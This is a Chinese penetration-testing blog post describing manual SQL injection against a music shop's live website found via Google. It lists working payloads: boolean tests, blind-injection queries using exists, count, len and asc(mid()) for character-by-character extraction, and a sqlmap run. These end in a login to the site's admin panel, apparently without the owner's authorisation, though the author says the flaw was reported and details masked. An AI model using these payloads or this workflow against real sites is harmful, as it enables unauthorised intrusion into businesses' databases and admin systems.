【渗透实战】日常挖洞第三期_对某琴行进行手工注入

●漏洞已提交
■重要细节全部打码
■部分细节对外开放
■本次入侵不对网站数据库进行任何更改
注:日常挖洞系列基本上是记录平常遇到的非常普通的漏洞,毫无看点,仅仅记录挖洞的经验
日常记录漏洞站点
google上找到一个琴行网站

判断sql注入

注入单引号’
报错"商品已下架"
网站后加上’ or ‘1’='1
报错"商品已下架",并且不爆出具体错误
继续更改
or 1=1
【渗透实战】日常挖洞第三期_对某琴行进行手工注入_第1张图片
网页正常返回并爆出该表下所有数据,看样子是int型
【渗透实战】日常挖洞第三期_对某琴行进行手工注入_第2张图片
●判断:存在sql注入点

开始注入

因为不返回具体信息,所以having 1=1的方法就报废了
所以盲注检测数据库
and exists(select * from 表名)
这个方法判断当前数据库下是否有此表
and (select count(字段) from 表名)
判断此表名下是否有某字段
and (select top 1 len (字段) from 表名)>数字
判断该列的字段长度是否大于某个数
and (select top 1 asc (mid (字段,位数,1)) from 表名) >ascii(1~128)
判断字段的ascii码
比如and (select top 1 asc (mid (字段,位数,1)) from 表名) >96
如果返回正常,而97返回不正常那么该字段的某位数的ascii码为97,查询ascii码表,此字为a
接着一个个猜就行,不过我可没这耐心,我直接用sqlmap跑出字段了
【渗透实战】日常挖洞第三期_对某琴行进行手工注入_第3张图片

成功登入网站管理界面
此处入侵没有什么技术含量,纯粹练练手感
【渗透实战】日常挖洞第三期_对某琴行进行手工注入_第4张图片

你可能感兴趣的:(渗透实战)